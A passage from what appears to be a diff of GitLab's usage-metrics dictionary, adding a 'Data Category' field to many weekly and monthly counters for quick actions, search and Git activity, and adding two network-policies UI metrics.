changing an issue's weight Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -12906,6 +15204,8 @@ Count of WAU changing an issue's weight Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -12918,6 +15218,8 @@ Aggregate count of MAU taking an action related to an issue Group: `group::project management` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12930,10 +15232,40 @@ Aggregate count of WAU taking an action related to an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` +### `redis_hll_counters.network_policies.clusters_using_network_policies_ui_monthly` + +Monthly number of distinct clusters with network policies using the network policies UI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210623202402_clusters_using_network_policies_ui_monthly.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `implemented` + +Tiers: `ultimate` + +### `redis_hll_counters.network_policies.clusters_using_network_policies_ui_weekly` + +Weekly number of distinct clusters with network policies using the network policies UI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210623202358_clusters_using_network_policies_ui_weekly.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `implemented` + +Tiers: `ultimate` + ### `redis_hll_counters.pipeline_authoring.o_pipeline_authoring_unique_users_committing_ciconfigfile_monthly` Monthly unique user count doing commits which contains the CI config file @@ -12942,6 +15274,8 @@ Monthly unique user count doing commits which contains the CI config file Group: `group::pipeline authoring` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12954,6 +15288,8 @@ Weekly unique user count doing commits which contains the CI config file Group: `group::pipeline authoring` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12966,6 +15302,8 @@ Monthly unique user count having merge requests which contains the CI config fil Group: `group::pipeline authoring` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12978,6 +15316,8 @@ Weekly unique user count having merge requests which contains the CI config file Group: `group::pipeline authoring` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -12990,6 +15330,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13002,6 +15344,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13014,6 +15358,8 @@ Count of MAU using the `/approve` quick action Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13026,6 +15372,8 @@ Count of WAU using the `/approve` quick action Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13038,6 +15386,8 @@ Count of MAU using the `/assign @user1 @user2` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -13050,6 +15400,8 @@ Count of WAU using the `/assign @user1 @user2` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -13062,6 +15414,8 @@ Count of MAU using the `/assign_reviewer` or `request_reviewer` quick action Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13074,6 +15428,8 @@ Count of WAU using the `/assign_reviewer` or `request_reviewer` quick action Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13086,6 +15442,8 @@ Count of MAU using the `/assign me` quick action to assign self to an issuable Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13098,6 +15456,8 @@ Count of WAU using the `/assign me` quick action to assign self to an issuable Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13110,6 +15470,8 @@ Count of MAU using the `/assign @user1` quick action to assign a single individu Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13122,6 +15484,8 @@ Count of WAU using the `/assign @user1` quick action to assign a single individu Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13134,6 +15498,8 @@ Count of MAU using the `/award` quick action to set an award emoji on an issuabl Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13146,6 +15512,8 @@ Count of WAU using the `/award` quick action to set an award emoji on an issuabl Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13158,6 +15526,8 @@ Count of MAU using the `/board_move` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13170,6 +15540,8 @@ Count of WAU using the `/board_move` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13182,6 +15554,8 @@ Count of MAU using the `/child_epic` quick action Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -13194,6 +15568,8 @@ Count of WAU using the `/child_epic` quick action Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -13206,6 +15582,8 @@ Count of MAU using the `/clear_weight` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -13218,6 +15596,8 @@ Count of WAU using the `/clear_weight` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -13230,6 +15610,8 @@ Count of MAU using the `/clone` quick action to clone an issue. Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13242,6 +15624,8 @@ Count of WAU using the `/clone` quick action to clone an issue. Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13254,6 +15638,8 @@ Count of MAU using the `/close` quick action to close an issuable Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13266,6 +15652,8 @@ Count of WAU using the `/close` quick action to close an issuable Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13278,6 +15666,8 @@ Count of MAU using the `/confidential` quick action to set an issue as confident Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13290,6 +15680,8 @@ Count of WAU using the `/confidential` quick action to set an issue as confident Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13302,6 +15694,8 @@ Count of MAU using the `/copy_metadata` quick action on an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13314,6 +15708,8 @@ Count of WAU using the `/copy_metadata` quick action on an issue Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13326,6 +15722,8 @@ Count of MAU using the `/copy_metadata` quick action on a Merge Request Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13338,6 +15736,8 @@ Count of WAU using the `/copy_metadata` quick action on a Merge Request Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13350,6 +15750,8 @@ Count of MAU using the `/create_merge_request` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13362,6 +15764,8 @@ Count of WAU using the `/create_merge_request` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13374,6 +15778,8 @@ Count of MAU using the `/done` quick action to mark a todo as done Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13386,6 +15792,8 @@ Count of WAU using the `/done` quick action to mark a todo as done Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13398,6 +15806,8 @@ Count of MAU using the `/draft` quick action on a Merge Request Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13410,6 +15820,8 @@ Count of WAU using the `/draft` quick action on a Merge Request Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13422,6 +15834,8 @@ Count of MAU using the `/due` quick action to change the due date on an issuable Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13434,6 +15848,8 @@ Count of WAU using the `/due` quick action to change the due date on an issuable Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13446,6 +15862,8 @@ Count of MAU using the `/duplicate` quick action to mark an issue as a duplicate Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13458,6 +15876,8 @@ Count of WAU using the `/duplicate` quick action to mark an issue as a duplicate Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13470,6 +15890,8 @@ Count of MAU using the `/epic` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -13482,6 +15904,8 @@ Count of WAU using the `/epic` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -13494,6 +15918,8 @@ Count of MAU using the `/estimate` quick action to set a time estimate on an iss Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13506,6 +15932,8 @@ Count of WAU using the `/estimate` quick action to set a time estimate on an iss Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13518,6 +15946,8 @@ Unique users using the /invite_email quick action to add a multiple email partic Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13530,6 +15960,8 @@ Unique users using the /invite_email quick action to add a multiple email partic Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13542,6 +15974,8 @@ Unique users using the /invite_email quick action to add a single email particip Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13554,6 +15988,8 @@ Unique users using the /invite_email quick action to add a single email particip Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13566,6 +16002,8 @@ Count of MAU using the `/iteration` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -13578,6 +16016,8 @@ Count of WAU using the `/iteration` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -13590,6 +16030,8 @@ Count of MAU using the `/label` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13602,6 +16044,8 @@ Count of WAU using the `/label` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13614,6 +16058,8 @@ Count of MAU using the `/lock` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13626,6 +16072,8 @@ Count of WAU using the `/lock` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13638,6 +16086,8 @@ Count of MAU using the `/merge` quick action Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13650,6 +16100,8 @@ Count of WAU using the `/merge` quick action Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13662,6 +16114,8 @@ Count of MAU using the `/milestone` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13674,6 +16128,8 @@ Count of WAU using the `/milestone` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13686,6 +16142,8 @@ Count of MAU using the `/move` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13698,6 +16156,8 @@ Count of WAU using the `/move` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13710,6 +16170,8 @@ Count of MAU using the `/parent_epic` quick action Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -13722,6 +16184,8 @@ Count of WAU using the `/parent_epic` quick action Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -13734,6 +16198,8 @@ Count of MAU using the `/promote` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -13746,6 +16212,8 @@ Count of WAU using the `/promote` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -13758,6 +16226,8 @@ Count of MAU using the `/publish` quick action Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -13770,6 +16240,8 @@ Count of WAU using the `/publish` quick action Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -13782,6 +16254,8 @@ Count of MAU using the `/reassign @user1` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13794,6 +16268,8 @@ Count of MAU using the `/reassign_reviewer` quick action Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13806,6 +16282,8 @@ Count of WAU using the `/reassign_reviewer` quick action Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13818,6 +16296,8 @@ Count of WAU using the `/reassign @user1` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13830,6 +16310,8 @@ Count of MAU using the `/rebase` quick action on a Merge Request Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13842,6 +16324,8 @@ Count of WAU using the `/rebase` quick action on a Merge Request Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13854,6 +16338,8 @@ Count of MAU using the `/relabel` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13866,6 +16352,8 @@ Count of WAU using the `/relabel` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13878,6 +16366,8 @@ Count of MAU using the `/relate` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13890,6 +16380,8 @@ Count of WAU using the `/relate` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13902,6 +16394,8 @@ Count of MAU using the `/remove_child_epic` quick action Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -13914,6 +16408,8 @@ Count of WAU using the `/remove_child_epic` quick action Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -13926,6 +16422,8 @@ Count of MAU using the `/remove_due_date` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13938,6 +16436,8 @@ Count of WAU using the `/remove_due_date` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13950,6 +16450,8 @@ Count of MAU using the `/remove_epic` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -13962,6 +16464,8 @@ Count of WAU using the `/remove_epic` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -13974,6 +16478,8 @@ Count of MAU using the `/remove_estimate` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13986,6 +16492,8 @@ Count of WAU using the `/remove_estimate` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -13998,6 +16506,8 @@ Count of MAU using the `/remove_iteration` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -14010,6 +16520,8 @@ Count of WAU using the `/remove_iteration` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -14022,6 +16534,8 @@ Count of MAU using the `/remove_milestone` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14034,6 +16548,8 @@ Count of WAU using the `/remove_milestone` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14046,6 +16562,8 @@ Count of MAU using the `/remove_parent_epic` quick action Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -14058,6 +16576,8 @@ Count of WAU using the `/remove_parent_epic` quick action Group: `group::product planning` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -14070,6 +16590,8 @@ Count of MAU using the `/remove_time_spent` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14082,6 +16604,8 @@ Count of WAU using the `/remove_time_spent` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14094,6 +16618,8 @@ Count of MAU using the `/remove_zoom` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14106,6 +16632,8 @@ Count of WAU using the `/remove_zoom` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14118,6 +16646,8 @@ Count of MAU using the `/reopen` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14130,6 +16660,8 @@ Count of WAU using the `/reopen` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14142,6 +16674,8 @@ Count of MAU using the `/shrug` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14154,6 +16688,8 @@ Count of WAU using the `/shrug` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14166,6 +16702,8 @@ Count of MAU using the `/spend` quick action to add time spent Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14178,6 +16716,8 @@ Count of WAU using the `/spend` quick action to add time spent Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14190,6 +16730,8 @@ Count of MAU using the `/spend` quick action to subtract time spent Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14202,6 +16744,8 @@ Count of WAU using the `/spend` quick action to subtract time spent Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14214,6 +16758,8 @@ Count of MAU using the `/submit_review` quick action on Merge Requests Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14226,6 +16772,8 @@ Count of WAU using the `/submit_review` quick action on Merge Requests Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14238,6 +16786,8 @@ Count of MAU using the `/subscribe` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14250,6 +16800,8 @@ Count of WAU using the `/subscribe` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14262,6 +16814,8 @@ Count of MAU using the `/tableflip` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14274,6 +16828,8 @@ Count of WAU using the `/tableflip` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14286,6 +16842,8 @@ Count of MAU using the `/tag` quick action Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14298,6 +16856,8 @@ Count of WAU using the `/tag` quick action Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14310,6 +16870,8 @@ Count of MAU using the `/target_branch` quick action on Merge Requests Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14322,6 +16884,8 @@ Count of WAU using the `/target_branch` quick action on Merge Requests Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14334,6 +16898,8 @@ Count of MAU using the `/title` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14346,6 +16912,8 @@ Count of WAU using the `/title` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14358,6 +16926,8 @@ Count of MAU using the `/todo` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14370,6 +16940,8 @@ Count of WAU using the `/todo` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14382,6 +16954,8 @@ Count of MAU using the `/unassign` quick action on Merge Requests Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14394,6 +16968,8 @@ Count of WAU using the `/unassign` quick action on Merge Requests Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14406,6 +16982,8 @@ Count of MAU using the `/unassign_reviewer` or `/remove_reviewer` quick action o Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14418,6 +16996,8 @@ Count of WAU using the `/unassign_reviewer` or `/remove_reviewer` quick action o Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14430,6 +17010,8 @@ Count of MAU using the `/unassign @user1` quick action on Merge Requests Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14442,6 +17024,8 @@ Count of WAU using the `/unassign @user1` quick action on Merge Requests Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14454,6 +17038,8 @@ Count of MAU using the `/unlabel` quick action to remove all labels Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14466,6 +17052,8 @@ Count of WAU using the `/unlabel` quick action to remove all labels Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14478,6 +17066,8 @@ Count of MAU using the `/unlabel` or `/remove_label` quick action to remove one Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14490,6 +17080,8 @@ Count of WAU using the `/unlabel` or `/remove_label` quick action to remove one Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14502,6 +17094,8 @@ Count of MAU using the `/unlock` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14514,6 +17108,8 @@ Count of WAU using the `/unlock` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14526,6 +17122,8 @@ Count of MAU using the `/unsubscribe` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14538,6 +17136,8 @@ Count of WAU using the `/unsubscribe` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14550,6 +17150,8 @@ Count of MAU using the `/weight` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -14562,6 +17164,8 @@ Count of WAU using the `/weight` quick action Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -14574,6 +17178,8 @@ Count of MAU using the `/wip` quick action on Merge Requests Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14586,6 +17192,8 @@ Count of WAU using the `/wip` quick action on Merge Requests Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14598,6 +17206,8 @@ Count of MAU using the `/zoom` quick action on Issues Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14610,6 +17220,8 @@ Count of WAU using the `/zoom` quick action on Issues Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14622,6 +17234,8 @@ Count of MAU using one or more quick actions Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14634,6 +17248,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: @@ -14646,6 +17262,8 @@ Calculated unique users to perform Advanced searches by month Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -14658,6 +17276,8 @@ Calculated unique users to perform Advanced searches by week Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -14670,6 +17290,8 @@ Calculated unique users to perform a search with a paid license enabled by month Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -14682,6 +17304,8 @@ Calculated unique users to perform a search with a paid license enabled by week Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -14694,6 +17318,8 @@ Calculated unique users to perform Basic or Advanced searches by month Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14706,6 +17332,8 @@ Calculated unique users to perform Basic or Advanced searches by week Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14718,6 +17346,8 @@ Total unique users for i_search_total, i_search_advanced, i_search_paid for rece Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14730,6 +17360,8 @@ Calculated unique users to perform Basic or Advanced searches by week Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14742,6 +17374,8 @@ Count of expanding the security report widget Group: `group::static analysis` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14754,6 +17388,8 @@ Count of expanding the security report widget Group: `group::static analysis` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14766,6 +17402,8 @@ Monthly number of users viewing snippets Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14778,6 +17416,8 @@ Weekly number of users viewing snippets Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14790,6 +17430,8 @@ Count of total design actions (upload, delete, comment, reply) Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14802,6 +17444,8 @@ Count of total design actions (upload, delete, comment, reply) Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14814,6 +17458,8 @@ Count of unique Git write actions Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14826,6 +17472,8 @@ Count of unique Git write actions Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14838,6 +17486,8 @@ Count of unique users who use code intelligence Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14850,6 +17500,8 @@ Count of unique users who use code intelligence Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14862,6 +17514,8 @@ Count of unique users who perform an action on a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14874,6 +17528,8 @@ Count of unique users who perform an action on a merge request Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14886,6 +17542,8 @@ Count of unique actions done on projects and related resources (create, edit, de Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14898,6 +17556,8 @@ Count of unique actions done on projects and related resources (create, edit, de Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14910,6 +17570,8 @@ Count of unique actions done on a wiki (create, edit, delete) Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -14922,6 +17584,8 @@ Count of unique actions 